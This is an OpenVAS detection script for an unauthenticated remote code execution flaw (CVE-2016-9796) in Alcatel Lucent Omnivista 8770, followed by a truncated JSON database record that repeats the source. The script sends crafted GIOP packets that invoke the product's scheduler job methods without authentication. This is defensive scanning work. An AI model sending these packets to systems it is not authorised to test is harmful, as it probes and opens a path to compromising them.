ID OPENVAS:1361412562310107112
Type openvas
Reporter Copyright (C) 2016 Greenbone Networks GmbH
Modified 2018-11-21T00:00:00
Description
This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 12465 2018-11-21 13:24:34Z cfischer $
#
# Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)
#
# Authors:
# Tameem Eissa <tameem.eissa@greenbone.net>
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:alcatel-lucent:omnivista";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.107112");
script_version("$Revision: 12465 $");
script_cve_id("CVE-2016-9796");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"last_modification", value:"$Date: 2018-11-21 14:24:34 +0100 (Wed, 21 Nov 2018) $");
script_tag(name:"creation_date", value:"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)");
script_name("Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
script_family("General");
script_dependencies("gb_alcatel_luc_omnvista_detect.nasl", "os_detection.nasl");
script_require_ports("Services/www", 80, 30024);
script_mandatory_keys("alc-luc-omnvista/installed", "Host/runs_windows");
script_xref(name:"URL", value:"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/40862/");
script_tag(name:"summary", value:"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.");
script_tag(name:"vuldetect", value:"Send a crafted giop packet request and check the response.");
script_tag(name:"insight", value:"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.");
script_tag(name:"impact", value:"Successful exploitation will allow
remote attackers to execute arbitrary code.");
script_tag(name:"affected", value:"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0.");
script_tag(name:"solution", value:"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue,
which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"Workaround");
exit(0);
}
include("host_details.inc");
if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
if( ! ver = get_app_version( cpe:CPE, port:port ) ) exit( 0 );
if( ver != "8770" ) exit ( 0 );
giopport = 30024;
if( ! get_port_state( giopport ) ) exit( 0 );
soc = open_sock_tcp( giopport );
if( ! soc ) exit( 0 );
req = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65,
0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74,
0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00,
0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a,
0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,
0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00,
0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06,
0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10,
0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31,
0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d,
0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a,
0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41,
0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72,
0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e,
0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64,
0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61,
0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e,
0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a,
0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62,
0x62, 0x00);
send( socket:soc, data:req );
sleep( 5 );
res = recv( socket:soc, length:4096 );
len = strlen( res );
if( ! len ) exit( 0 );
data = ""; # nb: To make openvas-nasl-lint happy...
for( i = 0; i < len; i = i + 1 ) {
if( ( ord( res[i] ) >= 61 ) ) {
data += res[i];
}
}
if( data !~ "GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ") exit ( 0 );
req2 = raw_string("0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,
0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00,
0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,
0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00");
send( socket:soc, data:req2 );
sleep( 5 );
res = recv( socket:soc, length:4096 );
len = strlen( res );
if( ! len ) exit( 0 );
data = "";
for( i = 0; i < len; i = i + 1 ) {
if( ( ord( res[i] ) >= 61 ) ) {
data += res[i];
}
}
close( soc );
if( data =~ "GIOPGIOP") {
security_message( port:giopport);
exit( 0 );
}
exit( 99 );
{"id": "OPENVAS:1361412562310107112", "bulletinFamily": "scanner", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)", "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.", "published": "2016-12-23T00:00:00", "modified": "2018-11-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "cvelist": ["CVE-2016-9796"], "type": "openvas", "lastseen": "2019-05-29T18:35:33", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-9796"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.", "edition": 7, "enchantments": {"dependencies": {"modified": "2018-11-22T11:08:26", "references": [{"idList": ["1337DAY-ID-26467"], "type": "zdt"}, {"idList": ["CVE-2016-9796"], "type": "cve"}, {"idList": ["EDB-ID:40862"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:140026"], "type": "packetstorm"}, {"idList": ["SSV:92563"], "type": "seebug"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "ee3fee4bd62c0c4116cb61de892bc3f071c42d19275679194bd89da4b6693301", "hashmap": [{"hash": "fb634a5017b2a41a91c85626dded43f9", "key": "published"}, {"hash": "70cca94720f62109b82fe3d873b630b1", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "093f6fa86e4b143448c139412887dda8", "key": "cvelist"}, {"hash": "35b06cdf6e7f1387d88e10ea205c0816", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "18f7ae8aaceb897d726f1bf00abd32b1", "key": "pluginID"}, {"hash": "9b0c8a560ca98109588056dc2f5375b9", "key": "references"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "0622425b32c3b455561de901e639f001", "key": "sourceData"}, {"hash": "cc48873685a1db65f44dc4a65ac3d77f", "key": "href"}, {"hash": "b709b30efc224af0ca142422dbaffff3", "key": "modified"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "id": "OPENVAS:1361412562310107112", "lastseen": "2018-11-22T11:08:26", "modified": "2018-11-21T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310107112", "published": "2016-12-23T00:00:00", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 12465 2018-11-21 13:24:34Z cfischer $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 12465 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 14:24:34 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/40862/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted giop packet request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0.\");\n\n script_tag(name:\"solution\", value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue,\n which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! ver = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\nif( ver != \"8770\" ) exit ( 0 );\n\ngiopport = 30024;\n\nif( ! get_port_state( giopport ) ) exit( 0 );\nsoc = open_sock_tcp( giopport );\nif( ! soc ) exit( 0 );\n\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65,\n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74,\n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a,\n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,\n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00,\n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06,\n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10,\n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31,\n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d,\n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a,\n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41,\n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72,\n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e,\n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64,\n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61,\n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e,\n0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a,\n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62,\n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\n\ndata = \"\"; # nb: To make openvas-nasl-lint happy...\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data += res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,\n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00,\n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,\n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data += res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)", "type": "openvas", "viewCount": 8}, "differentElements": ["cvss"], "edition": 7, "lastseen": "2018-11-22T11:08:26"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-9796"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to Remote Command Execution vulnerability.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ecf5e257c8c02e87bf69f1acbd41f5f847fa3ced5d78d1c53d53993dec809ffc", "hashmap": [{"hash": "fb634a5017b2a41a91c85626dded43f9", "key": "published"}, {"hash": "c5bb34af05c207ad0795b24b339835fb", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "c508dc802497bde903638e926fa16647", "key": "sourceData"}, {"hash": "093f6fa86e4b143448c139412887dda8", "key": "cvelist"}, {"hash": "eecca42a8be8bed371b48a635243e1fc", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "18f7ae8aaceb897d726f1bf00abd32b1", "key": "pluginID"}, {"hash": "9b0c8a560ca98109588056dc2f5375b9", "key": "references"}, {"hash": "414ffb7a9ac291dfddc8cd6cac0b9b19", "key": "description"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "cc48873685a1db65f44dc4a65ac3d77f", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "id": "OPENVAS:1361412562310107112", "lastseen": "2017-10-25T14:42:56", "modified": "2017-10-24T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310107112", "published": "2016-12-23T00:00:00", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 7545 2017-10-24 11:45:30Z cfischer $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 7545 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:45:30 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)\");\n\n script_tag(name: \"summary\" , value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to Remote Command Execution vulnerability.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted giop packet request and check the response\");\n\n script_tag(name: \"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0\");\n\n script_tag(name: \"solution\" , value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue, which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name : \"URL\" , value : \"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name : \"URL\" , value : \"https://www.exploit-db.com/exploits/40862/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif ( ! Ver = get_app_version( cpe:CPE, port: port)) exit( 0 );\nif ( Ver != \"8770\" ) exit ( 0 );\ngiopport = 30024;\nif( ! get_port_state( giopport ) ) exit( 0 );\nsoc = open_sock_tcp( giopport );\nif( ! soc ) exit( 0 );\n## Construct AddjobSet packet\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65, \n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74, \n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a, \n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, \n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00, \n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06, \n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10, \n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31, \n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d, \n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a, \n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41, \n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, \n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e, \n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64, \n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61, \n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e, \n0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a, \n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62, \n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, \n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00, \n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, \n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data = data + res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );\n", "title": 